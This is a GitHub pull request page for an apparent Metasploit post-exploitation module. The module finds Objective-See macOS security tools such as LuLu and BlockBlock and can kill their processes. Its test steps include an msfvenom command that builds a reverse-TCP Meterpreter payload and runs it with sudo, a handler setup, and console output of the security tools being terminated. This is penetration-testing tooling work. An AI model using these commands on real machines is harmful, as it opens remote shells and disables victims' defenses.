Skip to content

Add Objective See Hunter Module: OSX Antivirus Enumeration and Disablement #20813

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
gardnerapp wants to merge 11 commits into
base: master
Choose a base branch
from
Open

Add Objective See Hunter Module: OSX Antivirus Enumeration and Disablement #20813

gardnerapp wants to merge 11 commits into from
+121 −0

Conversation

@gardnerapp
Copy link
Contributor

@gardnerapp gardnerapp commented Dec 26, 2025

This module fulfills feature request 20447 for enumeration Objective See security projects such as LuLu, BlockBlock, Do No Disturb, Rei Key, Ransom Where and OverSight. The module checks for the presence of the .app folder for each product within the /Applications folder i.e. /Applications/LuLu.app etc. For each of the products discovered the module will also find the pids associated with that application. Lastly, when the KILL_PROCESSES option is enabled the module will send kill signals to the application(s) pids so long as the session has root privileges.

Verification

This module should be OS version and architecture independent. The following test were conducted on an OSX system with LuLu and BlockBlock installed. Installation for Objective See's products can be found here

  1. Create a payload and start a session w a handler
msfvenom -p osx/aarch64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f macho -o payload && sudo chmod +x payload && sudo ./payload

msfconsole -x "use exploit/multi/handler; set payload osx/aarch64/meterpreter/reverse_tcp; set lhost 127.0.0.1; set lport 4444; run"
  1. Once a session is obtained use the post/osx/manage/objective_see_hunter module
msf exploit(multi/handler) > use post/osx/manage/objective_see_killer
msf post(osx/manage/objective_see_killer) > options

Module options (post/osx/manage/objective_see_killer):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   KILL_PROCESSES  false            yes       Kills processes of installed objective see products.   
                                                                  Requires root privileges. 
                                           
   SESSION                          yes       The session to run this module on

msf post(osx/manage/objective_see_killer) > set session 1 
session => 1
msf post(osx/manage/objective_see_killer) > run
[*] Retrieving process list...
[*] Enumerating Objective See security products...
[+] The following Objective See products were found installed on the system:
[*] Found LuLu with pids of [706]
[*] Found BlockBlock Helper with pids of [701, 288]
[*] Post module execution completed
  1. (optional) Disable the products by setting KILL_PROCESSES to true
msf post(osx/manage/objective_see_killer) > set KILL_PROCESSES true 
KILL_PROCESSES => true
[*] Retrieving process list...
[*] Enumerating Objective See security products...
[+] The following Objective See products were found installed on the system:
[*] Found LuLu with pids of [3945]
[*] Found BlockBlock Helper with pids of [3947, 3946]
[*] Attempting to kill pid(s) [3945] for LuLu
[+] Kill signal was successful for 3945
[*] Attempting to kill pid(s) [3947, 3946] for BlockBlock Helper
[+] Kill signal was successful for 3947
[+] Kill signal was successful for 3946

Thanks again.

@gardnerapp gardnerapp mentioned this pull request Dec 26, 2025
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@gardnerapp